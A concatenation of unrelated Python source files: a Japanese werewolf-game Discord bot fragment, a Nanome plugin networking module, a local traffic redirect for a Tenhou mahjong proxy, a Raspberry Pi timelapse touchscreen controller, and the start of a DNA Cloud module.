v = Thread(target = vote, args = (player, players, remaining,),name = "vote")
v.start()
while True:
state = send.get()
if state[0] == "end":
await client.send_message(player.discord, state[1])
break
elif state[0] == "exc":
await client.send_message(player.discord, state[1])
else:
await client.send_message(player.discord, state[1])
message = await client.wait_for_message(author = player.discord)
receive.put(message.content)
results = getVoteResult(players, playable)
await client.send_message(CHANNEL, '全員の投票が終わりました。')
await client.send_message(CHANNEL, send.get())
await client.send_message(CHANNEL, 'それでは、結果発表です。')
getres = Thread(target = getGameresult, args = (players, results, remaining,), name = "getres")
getres.start()
while True:
state = send.get()
if state[0] == "end":
await client.send_message(CHANNEL, state[1])
break
else:
await client.send_message(CHANNEL, state[1])
STARTED = False
players = []
#===== JinroGame =====#
class Player():
def __init__(self, discord):
self.role = ""
self.type = ""
self.thiefflag = False
self.thiefbuff = ""
self.discord = discord
self.name = self.discord.name
self.voted = 0
send.put(self.name)
def action(self, players, remaining):
if self.role == "fortune teller":
send.put(["/fortune", 'あなたは##### fortune teller #####です。\n\n占いをするか、残りの2枚のカードを見るか選択してください。\n1 占う\n2 カードを見る'])#\n\n返答は"/fortune [content]"のフォーマットで行ってください。'])
while True:
choice = receive.get()
if choice not in ["1", "2"]:
send.put(["exc", "入力が正しくありません。"])
else:
choice = int(choice)
break
if choice == 1:
list = []
sentence = "占いたい人の番号を入力してください。\n"
for i, player in enumerate(players):
if player.name == self.name:
None
else:
sentence += (str(i+1) + " " + player.name + "\n")
list.append(str(i+1))
send.put(["/fortune", sentence])
while True:
target = receive.get()
if target is None:
None
elif target in list:
target = int(target) - 1
send.put(["end", players[target].name + " を占ったところ、 " + players[target].role + " だとわかりました。\n\nこれであなたのアクションは完了しました。"])
break
else:
send.put(["exc", "入力が正しくありません。"])
elif choice == 2:
sentence = "残りの2枚のカードは、" + str(remaining) + "です。\n\nこれであなたのアクションは完了しました。"
send.put(["end", sentence])
elif self.role == "werewolf":
send.put(["/werewolf", "あなたは##### werewolf #####です。\n仲間を確認するため、カモフラージュも兼ねて何か適当に入力してください。\n"])
lonely = True
sentence = ""
for player in players:
if player.role == "werewolf":
if not player.name == self.name:
sentence += ("werewolf: " + player.name + "\n")
lonely = False
if lonely:
sentence = "仲間はいないようだ。\n"
hoge = receive.get()
sentence += "\nこれであなたのアクションは完了しました。"
send.put(["end", sentence])
elif self.role == "thief":
sentence = "あなたは##### thief #####です。\n役職を交換したいプレイヤーの番号を入力してください。\n"
list = []
for i, player in enumerate(players):
if player.name == self.name:
None
else:
sentence += (str(i+1) + " " + player.name + "\n")
list.append(str(i+1))
send.put(["/thief", sentence])
while True:
target = receive.get()
if target is None:
None
elif target in list:
target = int(target) - 1
newrole = players[target].role
players[target].thiefflag = True
self.thiefflag = True
self.thiefbuff = newrole
send.put(["end", players[target].name + " からカードを奪い、あなたは " + newrole + " になりました。\nこのことは相手には通知されません。\n\nこれであなたのアクションは完了しました。"])
break
else:
send.put(["exc", "入力が正しくありません。"])
elif self.role == "hangman":
send.put(["/hangman", "あなたは##### hangman #####です。\nやることはないので、カモフラージュのために何か適当に打ち込んでください。"])
hoge = receive.get()
send.put(["end", "\nこれであなたのアクションは完了しました。"])
elif self.role == "citizen":
send.put(["/citizen","あなたは##### citizen #####です。\nやることはないので、カモフラージュのために何か適当に打ち込んでください。"])
hoge = receive.get()
send.put(["end", "\nこれであなたのアクションは完了しました。"])
def killed(self, players, playable):#returnは勝利プレイヤーの属性
if self.role == "hangman":
return "hangman"
elif self.role == "werewolf":
return "citizen"
elif "werewolf" not in playable:
return "nobody"
else:
return "werewolf"
def makeDeck(num_player):
num_player = int(num_player)
deck = []
role = []
roles = config["roles{}".format(num_player)]
for i in roles:
role.append(i)
for i in role:
a = int(roles[i])
for j in range(a):
deck.append(i)
return deck
def decideRole(deck):
random.shuffle(deck)
playable = deck[:-2]
remaining = deck[-2:]
return playable, remaining
def swapThief(players):
for player in players:
if player.thiefflag == True:
if player.role == "thief":
player.role = player.thiefbuff
else:
player.role = "thief"
return players
def vote(player, players, playable):
sentence = player.name + " さんの投票です。\n投票したいプレイヤーの番号を入力してください。\n"
list = []
for x, i in enumerate(players):
if player.name != i.name:
sentence += (str(x+1) + " " + i.name + "\n")
list.append(str(x+1))
send.put(["/vote", sentence])
while True:
tar = receive.get()
if tar.isdigit() and tar in list:
players[int(tar)-1].voted += 1
send.put(["end", players[int(tar)-1].name+" に投票しました。"])
break
else:
send.put(["exc", "入力が正しくありません。"])
def getVoteResult(players, playable):
judge = []
names = []
most = players[0].voted
for player in players:
if player.voted == most:
judge.append(player)
names.append(player.name)
elif player.voted > most:
judge = []
names = []
judge.append(player)
names.append(player.name)
most = player.voted
if len(names) == len(players):
send.put("あなたたちは平和村を宣言しました。")
if "werewolf" in playable:
return ["werewolf"]
else:
return ["peaceful"]
send.put("投票の結果、処刑されるプレイヤーは " + str(names) + " です。")
results = []
for i in judge:
results.append(i.killed(players, playable))
return results
def judgement(players, playable):#投票なしの場合
sentence = "\nそれでは、処刑するプレイヤーの番号を入力してください。\n平和村だと思う場合は、0を入力してください。\n\n"
sentence += "0 平和村宣言\n"
for i, player in enumerate(players):
sentence += (str(i+1) + " " + player.name + "\n")
while True:
judge = receive.get()
if judge is None:
None
elif judge == "0":
send.put(["end","あなたたちは平和村を宣言しました。"])
if "werewolf" not in playable:
return "peaceful"
else:
return "werewolf"
elif judge not in list:
send.put(["exc", "入力が正しくありません。"])
else:
send.put(["end", players[int(judge)-1].name + " を処刑します。"])
result = players[int(judge)-1].killed(players, playable)
break
return result
def getGameresult(players, results, remaining):
sentence = ""
sleep(3)
if "hangman" in results:
send.put([" ", "### 吊り人 ### の勝利です。\n\n勝利プレイヤー\t役職"])
for player in players:
if player.role == "hangman":
sentence += (player.name + "\t" + player.role + "\n")
send.put([" ", sentence])
elif "citizen" in results:
send.put([" ", "### 市民チーム ### の勝利です。\n\n勝利プレイヤー\t役職"])
for player in players:
if player.role not in ["hangman", "werewolf"]:
sentence += (player.name + "\t" + player.role + "\n")
send.put([" ", sentence])
elif "werewolf" in results:
send.put([" ", "### 人狼チーム ### の勝利です。\n\n勝利プレイヤー\t役職"])
for player in players:
if player.role == "werewolf":
sentence += (player.name + "\t" + player.role + "\n")
send.put([" ", sentence])
elif "peaceful" in results:
send.put([" ", "### 平和村 ### でした。\n"])
elif "nobody" in results:
send.put([" ", "### 勝者なし ###\n"])
sentence = "\n\n各プレイヤーの役職は以下の通りでした。\n"
for i, player in enumerate(players):
sentence += (player.name + "\t" + player.role + "\n")
sentence += ("\nそして、残っていた2枚のカードは" + str(remaining) + "でした。\n\nお疲れさまでした。")
send.put(["end", sentence])
#===== main =====#
def main():
client.run(config["BOT"]["TOKEN"])
if __name__ == "__main__":
main()
|
_plugin.py
|
from . import _PluginInstance
from nanome._internal import _network as Network
from nanome._internal._process import _ProcessManager, _LogsManager
from nanome._internal._network._serialization._serializer import Serializer
from nanome._internal._util._serializers import _TypeSerializer
from nanome.util.logs import Logs
from nanome.util import config
from multiprocessing import Process, Pipe, current_process
from timeit import default_timer as timer
import sys
import json
import cProfile
import time
import os
import fnmatch
import subprocess
import signal
try_reconnection_time = 20.0
keep_alive_time_interval = 60.0
__metaclass__ = type
class _Plugin(object):
__serializer = Serializer()
_plugin_id = -1
_custom_data = None
def __parse_args(self):
Logs._set_verbose(False)
for i in range(1, len(sys.argv)):
if sys.argv[i] == "-h":
Logs.message("Usage:", sys.argv[1],"[-h] [-a ADDRESS] [-p PORT]")
Logs.message(" -h display this help")
Logs.message(" -a connects to a NTS at the specified IP address")
Logs.message(" -p connects to a NTS at the specified port")
Logs.message(" -k specifies a key file to use to connect to NTS")
Logs.message(" -n name to display for this plugin in Nanome")
Logs.message(" -v enable verbose mode, to display Logs.debug")
Logs.message(" -r, --auto-reload restart plugin automatically if a .py or .json file in current directory changes")
Logs.message(" --ignore to use with auto-reload. All paths matching this pattern will be ignored, " \
"use commas to specify several. Supports */?/[seq]/[!seq]")
sys.exit(0)
elif sys.argv[i] == "-a":
if i >= len(sys.argv):
Logs.error("Error: -a requires an argument")
sys.exit(1)
self.__host = sys.argv[i + 1]
i += 1
elif sys.argv[i] == "-p":
if i >= len(sys.argv):
Logs.error("Error: -p requires an argument")
sys.exit(1)
try:
self.__port = int(sys.argv[i + 1])
except ValueError:
Logs.error("Error: -p argument has to be an integer")
sys.exit(1)
i += 1
elif sys.argv[i] == "-k":
if i >= len(sys.argv):
Logs.error("Error: -k requires an argument")
sys.exit(1)
self.__key_file = sys.argv[i + 1]
i += 1
elif sys.argv[i] == "-n":
if i >= len(sys.argv):
Logs.error("Error: -n requires an argument")
sys.exit(1)
self._description['name'] = sys.argv[i + 1]
i += 1
elif sys.argv[i] == "-v":
self.__has_verbose = True
Logs._set_verbose(True)
elif sys.argv[i] == "-r" or sys.argv[i] == "--auto-reload":
self.__has_autoreload = True
elif sys.argv[i] == "--ignore":
if i >= len(sys.argv):
Logs.error("Error: --ignore requires an argument")
sys.exit(1)
split = sys.argv[i + 1].split(",")
self.__to_ignore.extend(split)
def __read_key_file(self):
try:
f = open(self.__key_file, "r")
key = f.read()
return key
except:
return None
def _on_packet_received(self, packet):
if packet.packet_type == Network._Packet.packet_type_message_to_plugin:
session_id = packet.session_id
if session_id in self._sessions:
# packet.decompress()
self._sessions[session_id]._on_packet_received(packet.payload)
return
# If we don't know this session_id, try to register it first
if _Plugin.__serializer.try_register_session(packet.payload) == True:
received_version_table, _, _ = _Plugin.__serializer.deserialize_command(packet.payload, None)
version_table = _TypeSerializer.get_best_version_table(received_version_table)
self.__on_client_connection(session_id, version_table)
# Doesn't register? It's an error
else:
Logs.warning("Received a command from an unregistered session", session_id)
elif packet.packet_type == Network._Packet.packet_type_plugin_connection:
_Plugin._plugin_id = packet.plugin_id
Logs.message("Registered with plugin ID", _Plugin._plugin_id, "\n=======================================\n")
elif packet.packet_type == Network._Packet.packet_type_plugin_disconnection:
if _Plugin._plugin_id == -1:
if self._description['auth'] == None:
Logs.error("Connection refused by NTS. Are you missing a security key file?")
else:
Logs.error("Connection refused by NTS. Your security key file might be invalid")
sys.exit(1)
else:
Logs.debug("Connection ended by NTS")
sys.exit(0)
elif packet.packet_type == Network._Packet.packet_type_client_disconnection:
try:
id = packet.session_id
self._sessions[id].signal_and_close_pipes()
del self._sessions[id]
Logs.debug("Session", id, "disconnected")
except:
pass
elif packet.packet_type == Network._Packet.packet_type_keep_alive:
pass
else:
Logs.warning("Received a packet of unknown type", packet.packet_type, ". Ignoring")
def __file_filter(self, name):
return name.endswith(".py") or name.endswith(".json")
def __file_times(self, path):
found_file = False
for root, dirs, files in os.walk(path):
for file in filter(self.__file_filter, files):
file_path = os.path.join(root, file)
matched = False
for pattern in self.__to_ignore:
if fnmatch.fnmatch(file_path, pattern):
matched = True
if matched == False:
found_file = True
yield os.stat(file_path).st_mtime
if found_file == False:
yield 0.0
def __autoreload(self):
wait = 3
if os.name == "nt":
sub_kwargs = { 'creationflags': subprocess.CREATE_NEW_PROCESS_GROUP }
break_signal = signal.CTRL_BREAK_EVENT
else:
sub_kwargs = {}
break_signal = signal.SIGTERM
sub_args = [x for x in sys.argv if x != '-r' and x != "--auto-reload"]
try:
sub_args = [sys.executable] + sub_args
process = subprocess.Popen(sub_args, **sub_kwargs)
except:
Logs.error("Couldn't find a suitable python executable")
sys.exit(1)
last_mtime = max(self.__file_times("."))
while True:
try:
max_mtime = max(self.__file_times("."))
if max_mtime > last_mtime:
last_mtime = max_mtime
Logs.message("Restarting plugin")
process.send_signal(break_signal)
process = subprocess.Popen(sub_args, **sub_kwargs)
time.sleep(wait)
except KeyboardInterrupt:
process.send_signal(break_signal)
break
def __run(self):
if os.name == "nt":
signal.signal(signal.SIGBREAK, self.__on_termination_signal)
else:
signal.signal(signal.SIGTERM, self.__on_termination_signal)
if self._pre_run != None:
self._pre_run()
_Plugin.instance = self
self._description['auth'] = self.__read_key_file()
self._process_manager = _ProcessManager()
self._logs_manager = _LogsManager(self._plugin_class.__name__ + ".log")
self.__connect()
self.__loop()
def __connect(self):
self._network = Network._NetInstance(self, _Plugin._on_packet_received)
if self._network.connect(self.__host, self.__port):
if _Plugin._plugin_id >= 0:
plugin_id = _Plugin._plugin_id
else:
plugin_id = 0
packet = Network._Packet()
packet.set(0, Network._Packet.packet_type_plugin_connection, plugin_id)
packet.write_string(json.dumps(self._description))
self._network.send(packet)
self.__connected = True
self.__last_keep_alive = timer()
return True
else:
self.__disconnection_time = timer()
return False
def __loop(self):
to_remove = []
try:
while True:
if self.__connected == False:
elapsed = timer() - self.__disconnection_time
if elapsed >= try_reconnection_time:
Logs.message("Trying to reconnect...")
if self.__connect() == False:
self.__disconnection_time = timer()
continue
else:
time.sleep(try_reconnection_time - elapsed)
continue
if self._network.receive() == False:
self.__connected = False
self.__disconnect()
continue
if timer() - self.__last_keep_alive >= keep_alive_time_interval:
self.__last_keep_alive = timer()
packet = Network._Packet()
packet.set(_Plugin._plugin_id, Network._Packet.packet_type_keep_alive, 0)
self._network.send(packet)
del to_remove[:]
for id, session in self._sessions.items():
if session._read_from_plugin() == False:
session.close_pipes()
to_remove.append(id)
for id in to_remove:
self._sessions[id]._send_disconnection_message(_Plugin._plugin_id)
del self._sessions[id]
self._process_manager._update()
self._logs_manager._update()
except KeyboardInterrupt:
self.__exit()
def __disconnect(self):
to_remove = []
for id in self._sessions.keys():
to_remove.append(id)
for id in to_remove:
del self._sessions[id]
self.__disconnection_time = timer()
def __on_termination_signal(self, signum, frame):
self.__exit()
def __exit(self):
Logs.debug('Exiting')
for session in _Plugin.instance._sessions.values():
session.signal_and_close_pipes()
session.plugin_process.join()
if self._post_run != None:
self._post_run()
sys.exit(0)
def __on_client_connection(self, session_id, version_table):
main_conn_net, process_conn_net = Pipe()
main_conn_proc, process_conn_proc = Pipe()
session = Network._Session(session_id, self._network, self._process_manager, self._logs_manager, main_conn_net, main_conn_proc)
process = Process(target=_Plugin._launch_plugin, args=(self._plugin_class, session_id, process_conn_net, process_conn_proc, _Plugin.__serializer, _Plugin._plugin_id, version_table, _TypeSerializer.get_version_table(), Logs._is_verbose(), _Plugin._custom_data))
process.start()
session.plugin_process = process
self._sessions[session_id] = session
Logs.debug("Registered new session:", session_id)
@staticmethod
def _is_process():
return current_process().name != 'MainProcess'
@classmethod
def _launch_plugin_profile(cls, plugin_class, session_id, pipe_net, pipe_proc, serializer, plugin_id, version_table, original_version_table, verbose, custom_data):
cProfile.runctx('_Plugin._launch_plugin(plugin_class, session_id, pipe_net, pipe_proc, serializer, plugin_id, version_table, original_version_table, verbose, custom_data)', globals(), locals(), 'profile.out')
@classmethod
def _launch_plugin(cls, plugin_class, session_id, pipe_net, pipe_proc, serializer, plugin_id, version_table, original_version_table, verbose, custom_data):
plugin = plugin_class()
_PluginInstance.__init__(plugin, session_id, pipe_net, pipe_proc, serializer, plugin_id, version_table, original_version_table, verbose, custom_data)
Logs.debug("Starting plugin")
plugin._run()
def __init__(self, name, description, category = "", has_advanced = False):
self._sessions = dict()
self._description = {
'name': name,
'description': description,
'category': category,
'hasAdvanced': has_advanced,
'auth': None
}
self._plugin_class = None
self.__connected = False
self.__has_autoreload = False
self.__has_verbose = False
self.__to_ignore = []
self._pre_run = None
self._post_run = None
|
redirect.py
|
import logging
import threading
import pydivert
class Redirect:
def __init__(self, server_host, server_port, proxy_host, proxy_port):
self.client_host = None
self.client_port = 0
self.server_host = server_host
self.server_port = server_port
self.proxy_host = proxy_host
self.proxy_port = proxy_port
def handle(self):
"""
Redirect local outbound packet to server_host:server_port to proxy_host:proxy_port.
Packets sent by the proxy to the client should appear as if they are directly sent from the server,
i.e. the proxy is invisible to the client.
"""
# Reflect [client -> server] into [client -> proxy]
threading.Thread(target=self.reflect_client_to_server).start()
while not self.client_host:
continue
# Reflect [proxy -> client] into [server -> client]
threading.Thread(target=self.reflect_proxy_to_client).start()
def reflect_client_to_server(self):
"""
Reflect packets from [client -> server] into [client -> proxy].
"""
packet_filter = f"tcp and outbound and" \
f" (ip.DstAddr == {self.server_host} and tcp.DstPort == {self.server_port}" \
f" and (ip.SrcAddr != {self.proxy_host} or tcp.SrcPort != {self.proxy_port}))"
with pydivert.WinDivert(filter=packet_filter) as w:
logging.info(f"[*] Ready to reflect [client -> {self.server_host}:{self.server_port}] packets.")
for packet in w:
self.client_port = packet.src_port
self.client_host = packet.src_addr
packet.dst_addr = self.proxy_host
packet.dst_port = self.proxy_port
packet.direction = pydivert.Direction.INBOUND
w.send(packet)
def reflect_proxy_to_client(self):
"""
Reflect packets from [proxy -> client] into [server -> client].
"""
packet_filter = f"tcp and outbound and" \
f" (ip.DstAddr == {self.client_host} and tcp.DstPort == {self.client_port}" \
f" and ip.SrcAddr == {self.proxy_host} or tcp.SrcPort == {self.proxy_port})"
with pydivert.WinDivert(filter=packet_filter) as w:
logging.info("[*] Ready to reflect [proxy -> client] packets.")
for packet in w:
packet.src_addr = self.server_host
packet.src_port = self.server_port
packet.direction = pydivert.Direction.INBOUND
w.send(packet)
if __name__ == '__main__':
from main import TENHOU_HOST, TENHOU_PORT, WSS_PROXY_HOST, WSS_PROXY_PORT
for host in TENHOU_HOST:
redirect = Redirect(host, TENHOU_PORT, WSS_PROXY_HOST, WSS_PROXY_PORT)
redirect_thread = threading.Thread(target=redirect.handle)
redirect_thread.start()
|
lapse.py
|
#!/usr/bin/python
# Lapse-Pi timelapse controller for Raspberry Pi
# This must run as root (sudo python lapse.py) due to framebuffer, etc.
#
# http://www.adafruit.com/products/998 (Raspberry Pi Model B)
# http://www.adafruit.com/products/1601 (PiTFT Mini Kit)
#
# Prerequisite tutorials: aside from the basic Raspbian setup and PiTFT setup
# http://learn.adafruit.com/adafruit-pitft-28-inch-resistive-touchscreen-display-raspberry-pi
#
# lapse.py by David Hunt (dave@davidhunt.ie)
# based on cam.py by Phil Burgess / Paint Your Dragon for Adafruit Industries.
# BSD license, all text above must be included in any redistribution.
import cPickle
import fnmatch
import os
import pygame
import threading
from pygame.locals import FULLSCREEN, MOUSEBUTTONDOWN, MOUSEBUTTONUP
from time import sleep
from datetime import datetime, timedelta
# UI classes ---------------------------------------------------------------
# Icon is a very simple bitmap class, just associates a name and a pygame
# image (PNG loaded from icons directory) for each.
# There isn't a globally-declared fixed list of Icons. Instead, the list
# is populated at runtime from the contents of the 'icons' directory.
class Icon:
def __init__(self, name):
self.name = name
try:
self.bitmap = pygame.image.load(iconPath + '/' + name + '.png')
except:
pass
# Button is a simple tappable screen region. Each has:
# - bounding rect ((X,Y,W,H) in pixels)
# - optional background color and/or Icon (or None), always centered
# - optional foreground Icon, always centered
# - optional single callback function
# - optional single value passed to callback
# Occasionally Buttons are used as a convenience for positioning Icons
# but the taps are ignored. Stacking order is important; when Buttons
# overlap, lowest/first Button in list takes precedence when processing
# input, and highest/last Button is drawn atop prior Button(s). This is
# used, for example, to center an Icon by creating a passive Button the
# width of the full screen, but with other buttons left or right that
# may take input precedence (e.g. the Effect labels & buttons).
# After Icons are loaded at runtime, a pass is made through the global
# buttons[] list to assign the Icon objects (from names) to each Button.
class Button:
def __init__(self, rect, **kwargs):
self.rect = rect # Bounds
self.color = None # Background fill color, if any
self.iconBg = None # Background Icon (atop color fill)
self.iconFg = None # Foreground Icon (atop background)
self.bg = None # Background Icon name
self.fg = None # Foreground Icon name
self.callback = None # Callback function
self.value = None # Value passed to callback
for key, value in kwargs.iteritems():
if key == 'color': self.color = value
elif key == 'bg' : self.bg = value
elif key == 'fg' : self.fg = value
elif key == 'cb' : self.callback = value
elif key == 'value': self.value = value
def selected(self, pos):
x1 = self.rect[0]
y1 = self.rect[1]
x2 = x1 + self.rect[2] - 1
y2 = y1 + self.rect[3] - 1
if ((pos[0] >= x1) and (pos[0] <= x2) and
(pos[1] >= y1) and (pos[1] <= y2)):
if self.callback:
if self.value is None:
self.callback()
else:
self.callback(self.value)
return True
return False
def draw(self, screen):
if self.color:
screen.fill(self.color, self.rect)
if self.iconBg:
screen.blit(self.iconBg.bitmap,
(self.rect[0]+(self.rect[2]-self.iconBg.bitmap.get_width())/2,
self.rect[1]+(self.rect[3]-self.iconBg.bitmap.get_height())/2))
if self.iconFg:
screen.blit(self.iconFg.bitmap,
(self.rect[0]+(self.rect[2]-self.iconFg.bitmap.get_width())/2,
self.rect[1]+(self.rect[3]-self.iconFg.bitmap.get_height())/2))
def setBg(self, name):
if name is None:
self.iconBg = None
else:
for i in icons:
if name == i.name:
self.iconBg = i
break
def numericCallback(n): # Pass 1 (next setting) or -1 (prev setting)
global screenMode
global numberstring
if n < 10:
numberstring = numberstring + str(n)
elif n == 10:
numberstring = numberstring[:-1]
elif n == 11:
screenMode = 1
elif n == 12:
screenMode = returnScreen
numeric = int(numberstring)
v[dict_idx] = numeric
def settingCallback(n): # Pass 1 (next setting) or -1 (prev setting)
global screenMode
screenMode += n
if screenMode < 1: screenMode = len(buttons) - 1
elif screenMode >= len(buttons): screenMode = 1
def valuesCallback(n): # Pass 1 (next setting) or -1 (prev setting)
global screenMode
global returnScreen
global numberstring
global numeric
global v
global dict_idx
if n == -1:
screenMode = 0
saveSettings()
elif n == 2:
dict_idx='Interval'
numberstring = str(v[dict_idx])
screenMode = 2
returnScreen = 1
elif n == 3:
dict_idx='Images'
numberstring = str(v[dict_idx])
screenMode = 2
returnScreen = 1
def viewCallback(n): # Viewfinder buttons
global screenMode, screenModePrior
if n is 0: # Gear icon
screenMode = 1
def doneCallback(): # Exit settings
global screenMode
if screenMode > 0:
saveSettings()
screenMode = 0 # Switch back to main window
def startCallback(n): # start/Stop the timelapse thread
global t, busy, threadExited
global currentframe
if n == 1:
if busy == False:
if (threadExited == True):
# Re-instanciate the object for the next start
t = threading.Thread(target=timeLapse)
threadExited = False
t.start()
if n == 0:
if busy == True:
busy = False
t.join()
currentframe = 0
# Re-instanciate the object for the next time around.
t = threading.Thread(target=timeLapse)
def quitCallback(): # Quit confirmation button
raise SystemExit
def offCallback(): # Turn Off Rasp
os.system("sudo halt")
raise SystemExit
def render_video(photos_dir):
global rendering
rendering = True
os.system(
"avconv -f image2 -i " + photos_dir + "/" + "%07d.jpg -r 12 -s 1920x1080 " + photos_dir + "/" + "timelapse.mp4")
rendering = False
def timeLapse():
global v
global settling_time
global rendering
global busy, threadExited, r
global currentframe
global error
busy = True
photos_dir = os.path.join("/home/pi/timelapse/", datetime.now().strftime('%d-%m-%Y\ %H:%M'))
os.system("sudo mkdir " + photos_dir)
for frame in range( 1 , v['Images'] + 1 ):
if not busy:
break
currentframe = frame
filename = str(frame).zfill(7) + ".jpg"
os.system("fswebcam -d /dev/video0 -r 1920x1080 --no-banner " + photos_dir + "/" + filename)
sleep(settling_time)
print("Rendering")
r = threading.Thread(target=render_video)
r.join()
currentframe = 0
busy = False
threadExited = True
# Global stuff -------------------------------------------------------------
t = threading.Thread(target=timeLapse)
r = threading.Thread(target=render_video)
busy = False
threadExited = False
rendering = False
screenMode = 0 # Current screen mode; default = viewfinder
screenModePrior = -1 # Prior screen mode (for detecting changes)
iconPath = 'icons' # Subdirectory containing UI bitmaps (PNG format)
numeric = 0 # number from numeric keypad
numberstring = "0"
returnScreen = 0
currentframe = 0
settling_time = 2.3
interval_delay = 0.2
dict_idx = "Interval"
v = {
"Interval": 3000,
"Images": 150}
error = ''
icons = [] # This list gets populated at startup
# buttons[] is a list of lists; each top-level list element corresponds
# to one screen mode (e.g. viewfinder, image playback, storage settings),
# and each element within those lists corresponds to one UI button.
# There's a little bit of repetition (e.g. prev/next buttons are
# declared for each settings screen, rather than a single reusable
# set); trying to reuse those few elements just made for an ugly
# tangle of code elsewhere.
buttons = [
# Screen mode 0 is main view screen of current status
[Button(( 5,180,60, 60), bg='start', cb=startCallback, value=1),
Button(( 77,180,60, 60), bg='cog', cb=viewCallback, value=0),
Button((150,180,60, 60), bg='stop', cb=startCallback, value=0),
# Button((223,180,60, 60), bg='quit', cb=quitCallback),
# Button((296,180,60, 60), bg='off', cb=offCallback)],
Button((223,180,60, 60), bg='off', cb=offCallback)],
# Screen 1 for changing values and setting motor direction
# [Button((260, 0, 60, 60), bg='cog', cb=valuesCallback, value=1),
[Button((260, 60, 60, 60), bg='cog', cb=valuesCallback, value=2),
Button((260,120, 60, 60), bg='cog', cb=valuesCallback, value=3),
Button(( 0,180,160, 60), bg='ok', cb=valuesCallback, value=-1),],
# Screen 2 for numeric input
[Button(( 0, 0,320, 60), bg='box'),
Button((180,120, 60, 60), bg='0', cb=numericCallback, value=0),
Button(( 0,180, 60, 60), bg='1', cb=numericCallback, value=1),
Button((120,180, 60, 60), bg='3', cb=numericCallback, value=3),
Button(( 60,180, 60, 60), bg='2', cb=numericCallback, value=2),
Button(( 0,120, 60, 60), bg='4', cb=numericCallback, value=4),
Button(( 60,120, 60, 60), bg='5', cb=numericCallback, value=5),
Button((120,120, 60, 60), bg='6', cb=numericCallback, value=6),
Button(( 0, 60, 60, 60), bg='7', cb=numericCallback, value=7),
Button(( 60, 60, 60, 60), bg='8', cb=numericCallback, value=8),
Button((120, 60, 60, 60), bg='9', cb=numericCallback, value=9),
Button((240,120, 80, 60), bg='del', cb=numericCallback, value=10),
Button((180,180,140, 60), bg='ok', cb=numericCallback, value=12),
Button((180, 60,140, 60), bg='cancel',cb=numericCallback, value=11)]
]
# Assorted utility functions -----------------------------------------------
def saveSettings():
global v
try:
outfile = open('lapse.pkl', 'wb')
# Use a dictionary (rather than pickling 'raw' values) so
# the number & order of things can change without breaking.
cPickle.dump(v, outfile)
outfile.close()
except:
pass
def loadSettings():
global v
try:
infile = open('lapse.pkl', 'rb')
v = cPickle.load(infile)
infile.close()
except:
pass
# Initialization -----------------------------------------------------------
# Init framebuffer/touchscreen environment variables
os.putenv('SDL_VIDEODRIVER', 'fbcon')
# Init pygame and screen
print ("Initting...")
pygame.init()
print("Setting fullscreen...")
modes = pygame.display.list_modes(16)
screen = pygame.display.set_mode(modes[0], FULLSCREEN, 16)
print ("Loading Icons...")
# Load all icons at startup.
for file in os.listdir(iconPath):
if fnmatch.fnmatch(file, '*.png'):
icons.append(Icon(file.split('.')[0]))
# Assign Icons to Buttons, now that they're loaded
print("Assigning Buttons")
for s in buttons: # For each screenful of buttons...
for b in s: # For each button on screen...
for i in icons: # For each icon...
if b.bg == i.name: # Compare names; match?
b.iconBg = i # Assign Icon to Button
b.bg = None # Name no longer used; allow garbage collection
if b.fg == i.name:
b.iconFg = i
b.fg = None
print("Load Settings")
loadSettings() # Must come last; fiddles with Button/Icon states
print("loading background..")
img = pygame.image.load("icons/LapsePi_hi.png")
if img is None or img.get_height() < 240: # Letterbox, clear background
screen.fill(0)
if img:
screen.blit(img,
((480 - img.get_width() ) / 2,
(320 - img.get_height()) / 2))
pygame.display.update()
sleep(2)
# Main loop ----------------------------------------------------------------
print("mainloop..")
while(True):
# Process touchscreen input
while True:
for event in pygame.event.get():
if(event.type is MOUSEBUTTONDOWN):
pos = pygame.mouse.get_pos()
for b in buttons[screenMode]:
if b.selected(pos): break
elif(event.type is MOUSEBUTTONUP):
motorRunning = 0
if screenMode >= 0 or screenMode != screenModePrior: break
if img is None or img.get_height() < 240: # Letterbox, clear background
screen.fill(0)
if img:
screen.blit(img,
((480 - img.get_width() ) / 2,
(320 - img.get_height()) / 2))
# Overlay buttons on display and update
for i,b in enumerate(buttons[screenMode]):
b.draw(screen)
if screenMode == 2:
myfont = pygame.font.SysFont("Arial", 50)
label = myfont.render(numberstring, 1, (255,255,255))
screen.blit(label, (10, 2))
if screenMode == 1:
myfont = pygame.font.SysFont("Arial", 30)
label = myfont.render("Interval:" , 1, (255,255,255))
screen.blit(label, (10, 70))
label = myfont.render("Frames:" , 1, (255,255,255))
screen.blit(label, (10,130))
label = myfont.render(str(v['Interval']) + "ms" , 1, (255,255,255))
screen.blit(label, (130, 70))
label = myfont.render(str(v['Images']) , 1, (255,255,255))
screen.blit(label, (130,130))
if screenMode == 0:
myfont = pygame.font.SysFont("Arial", 30)
label = myfont.render("Interval:" , 1, (255,255,255))
screen.blit(label, (10, 50))
label = myfont.render("Frames:" , 1, (255,255,255))
screen.blit(label, (10, 90))
label = myfont.render("Remaining:" , 1, (255,255,255))
screen.blit(label, (10,130))
label = myfont.render(str(v['Interval']) + "ms" , 1, (255,255,255))
screen.blit(label, (280, 50))
label = myfont.render(str(currentframe) + " of " + str(v['Images']) , 1, (255,255,255))
screen.blit(label, (280, 90))
if rendering:
label = myfont.render("Please wait, Rendering video...", 1, (255, 255, 255))
screen.blit(label, (10, 280))
elif busy:
label = myfont.render("Recording...", 1, (255, 255, 255))
screen.blit(label, (10, 280))
intervalLength = float((v['Interval'] + (settling_time*1000)))
remaining = float((intervalLength * (v['Images'] - currentframe)) / 1000)
sec = timedelta(seconds=int(remaining))
d = datetime(1,1,1) + sec
remainingStr = "%dh %dm %ds" % (d.hour, d.minute, d.second)
label = myfont.render(remainingStr , 1, (255,255,255))
screen.blit(label, (280, 130))
label = myfont.render(str(error) , 1, (255,255,255))
screen.blit(label, (10, 280))
pygame.display.update()
screenModePrior = screenMode
|
panels.py
|
# -*- coding: utf-8 -*-
"""
#########################################################################
Author: Shalin Shah
Project: DNA Cloud
Graduate Mentor: Dixita Limbachya
Mentor: Prof. Manish K Gupta
Date: 5 November 2013
Website: www.guptalab.org/dnacloud
This module contains both the panels for encoding and decoding.
#########################################################################
"""
import sys
from PIL import Image
if "win" in sys.platform:
from PIL import PngImagePlugin
import unicodedata
import barcodeGenerator
import math
import os
import sqlite3
import sqlite3 as lite
import wx
import extraModules
import multiprocessing
import time
from datetime import datetime
import shutil
import threading
CHUNK_SIZE = 1000000
if hasattr(sys, "frozen"):
PATH = os.path.dirname(sys.executable)
else:
